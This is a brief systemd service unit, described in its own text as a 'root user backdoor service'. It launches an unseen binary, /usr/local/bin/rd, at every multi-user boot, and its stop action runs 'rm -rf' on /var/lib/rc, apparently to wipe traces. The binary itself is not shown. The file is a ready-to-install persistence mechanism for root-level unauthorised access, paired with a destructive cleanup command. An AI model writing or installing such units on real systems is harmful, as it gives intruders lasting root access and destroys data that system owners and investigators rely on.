[Unit]
Description=root user backdoor service

[Service]
Type=simple
ExecStart=/usr/local/bin/rd
ExecStop=/bin/rm -rf /var/lib/rc

[Install]
WantedBy=multi-user.target
